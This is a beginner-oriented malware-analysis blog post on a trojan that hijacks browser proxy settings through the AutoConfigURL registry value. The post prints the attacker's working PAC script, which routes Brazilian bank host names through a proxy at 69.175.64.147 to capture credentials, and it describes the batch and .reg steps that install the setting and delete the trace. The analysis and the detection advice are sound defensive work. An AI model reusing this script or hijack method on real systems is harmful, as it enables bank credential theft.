Traversing a Financial Crimeware which uses Proxy Technique

Written by traversecode. Posted in Financial Crimewares, Malware Analysis

Here I am going to 'Traverse' a Financial Crimeware which uses a simple proxy technique. The intention of this analysis is to share it with beginners.

But what is Financial Crimeware?

Financial crimeware is malware, or an exploit, built to steal financial information such as bank account numbers, passwords and credit card numbers, with the intention of making unauthorized transactions using the stolen data.

This crimeware is packed with UPX, so unpacking it was not much of a challenge. The strings of the unpacked file already gave a good idea of what it was going to do.

On execution, the Trojan reports to its Command and Control server, sending the computer name of the machine it has just infected, as shown in the screenshot below,

[screenshot: check-in request to the C&C server containing the computer name]

It then creates a batch file in %rootdrive%, as shown below,

[screenshot: the batch file dropped in %rootdrive%]

What is Edt.reg in the above screenshot?

Edt.reg contains a registry value that has to be added to the registry, as shown below,

[screenshot: contents of Edt.reg]

So the batch file is responsible for importing that value into the registry and then deleting 'Edt.reg' from %rootdrive%, so the clue is gone once the setting is in place.

But why does the Trojan need to do this?

The value being added is 'AutoConfigURL' under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings. It points Internet Explorer (and any other application that uses the WinINet proxy settings) at a proxy auto-configuration (PAC) script hosted on the attacker's server. For every request the browser calls the script's FindProxyForURL function, and it is that script, not the web site being visited, that decides whether the request goes directly to the site or through a proxy chosen by the attacker. Nothing in DNS or the hosts file has to be touched, and the malware does not need to keep running: the registry value persists and the routing logic lives on the remote server, where the attacker can change it at any time.

In our case the file 'file.pac' on the remote server contains the following function,

function FindProxyForURL(url, host) {
    // Host names of Brazilian banks. Every entry is an exact host name; there are no wildcards.
    var n = new Array(
        "www.bradesco.com.br", "bradesco.com.br",
        "www.santander.com.br", "santander.com.br",
        "www.banespa.com.br", "banespa.com.br",
        "www.santanderbanespa.com.br", "santanderbanespa.com.br",
        "www.real.com.br", "real.com.br", "bancoreal.com.br", "www.bancoreal.com.br",
        "www.itau.com.br", "itau.com.br",
        "www.banrisul.com.br", "banrisul.com.br",
        "www.bancodobrasil.com.br", "www.bb.com.br", "bancodobrasil.com.br", "bb.com.br",
        "www.unibanco.com.br", "unibanco.com.br",
        "internetbanking.caixa.gov.br", "www.caixa.gov.br", "caixa.gov.br");
    for (var i = 0; i < n.length; i++) {
        // shExpMatch is a PAC built-in doing shell-style matching; without '*' it is an exact match
        if (shExpMatch(host, n[i])) {
            return "PROXY 69.175.64.147:80";   // bank traffic goes through the attacker's proxy
        }
    }
    return "DIRECT";   // everything else goes straight to the real site
}

It is very clear that this targets Brazilian financial institutions. Any request from the infected machine to one of the listed host names is sent through the proxy at 69.175.64.147:80, while every other site goes DIRECT, so the user sees nothing unusual elsewhere. Note that the list contains no wildcards, so only these exact host names are matched; a bank subdomain that is not listed would still go direct. So let me capture the packets and put the screenshot below.
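To see the routing decision without an infected machine, the following is an added example (not code from the original post) that runs the attacker's FindProxyForURL offline under Node.js. Browsers supply shExpMatch() to PAC scripts, so it is reimplemented here with the standard shell-style semantics ('*' matches any run of characters, '?' one character, whole string must match). The sample requests are constructed for the example; they are not from the post's capture. The block also shows how much wider the net would be if the attacker had used a wildcard pattern, which is a hypothetical variant and not what file.pac does.

```javascript
// Added example, not code from the original post: an offline evaluator for the
// attacker's PAC script. A browser normally supplies shExpMatch(); it is
// reimplemented here so the script runs under plain Node.js.

// PAC's shExpMatch(): shell-style pattern where '*' matches any run of
// characters and '?' matches exactly one; the whole string must match.
function shExpMatch(str, pattern) {
  const body = pattern
    .split("")
    .map((c) => {
      if (c === "*") return ".*";
      if (c === "?") return ".";
      return c.replace(/[.+^${}()|[\]\\]/g, "\\$&"); // escape regex metacharacters
    })
    .join("");
  return new RegExp("^" + body + "$").test(str);
}

// The attacker's FindProxyForURL, copied from file.pac as shown in the post.
function FindProxyForURL(url, host) {
  var n = new Array("www.bradesco.com.br", "bradesco.com.br", "www.santander.com.br", "santander.com.br", "www.banespa.com.br", "banespa.com.br", "www.santanderbanespa.com.br", "santanderbanespa.com.br", "www.real.com.br", "real.com.br", "bancoreal.com.br", "www.bancoreal.com.br", "www.itau.com.br", "itau.com.br", "www.banrisul.com.br", "banrisul.com.br", "www.bancodobrasil.com.br", "www.bb.com.br", "bancodobrasil.com.br", "bb.com.br", "www.unibanco.com.br", "unibanco.com.br", "internetbanking.caixa.gov.br", "www.caixa.gov.br", "caixa.gov.br");
  for (var i = 0; i < n.length; i++) {
    if (shExpMatch(host, n[i])) {
      return "PROXY 69.175.64.147:80";
    }
  }
  return "DIRECT";
}

// Constructed requests standing in for what a browser on the infected machine
// would ask the PAC script about (browsers pass the host name in lower case).
const SAMPLE_REQUESTS = [
  ["http://bradesco.com.br/", "bradesco.com.br"],
  ["https://www.itau.com.br/login", "www.itau.com.br"],
  ["https://internetbanking.caixa.gov.br/", "internetbanking.caixa.gov.br"],
  ["https://www.google.com/", "www.google.com"],
  ["https://internetbanking.bradesco.com.br/", "internetbanking.bradesco.com.br"],
];

// Run every request through the script and record where it would be sent.
function routeRequests(requests) {
  return requests.map(([url, host]) => ({ host, route: FindProxyForURL(url, host) }));
}

// Hosts that a list of patterns would catch. Used to compare the attacker's
// exact-name list with a hypothetical wildcard version such as "*.bradesco.com.br".
function hostsMatching(hosts, patterns) {
  return hosts.filter((h) => patterns.some((p) => shExpMatch(h, p)));
}

function demo() {
  for (const r of routeRequests(SAMPLE_REQUESTS)) {
    console.log(r.host, "->", r.route);
  }
  const hosts = SAMPLE_REQUESTS.map(([, h]) => h);
  console.log("a wildcard pattern would also catch:", hostsMatching(hosts, ["*.bradesco.com.br"]));
}

if (typeof require !== "undefined" && require.main === module) demo();
```

Running it shows the three listed bank hosts going to PROXY 69.175.64.147:80 and both www.google.com and internetbanking.bradesco.com.br going DIRECT: the exact-name list misses the unlisted subdomain, while the wildcard variant would catch it. The same evaluator can be pointed at any PAC file pulled from a suspect AutoConfigURL to list which hosts it diverts.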

[screenshot: packet capture of the proxied request]

In the network capture above you can see that the GET request I made was to 'http://bradesco.com.br', but the pages are served by 69.175.64.147, the malicious proxy. Because the proxy sits between the browser and the bank, it can read and rewrite every request and response for the listed sites, and with plain HTTP there is no certificate warning to tip the user off.

When I type a junk account number on a clean system, the bank says the details are invalid.

[screenshot: the real bank site rejecting the junk account number]

But on the infected machine the remote proxy takes me to a next page that asks for more information, as shown in the screenshot below,

[screenshot: the proxy's follow-up page asking for more information]

Conclusion:

This is a very simple technique used by the Trojan writer to steal financial information: a single registry value points the browser at a remote PAC script, the script routes only the bank sites through the malicious proxy, and the proxy serves its own pages to capture the user's credentials. On a suspect machine, checking the AutoConfigURL value under Internet Settings, and fetching the PAC file it points to, is a quick way to spot this kind of hijack.
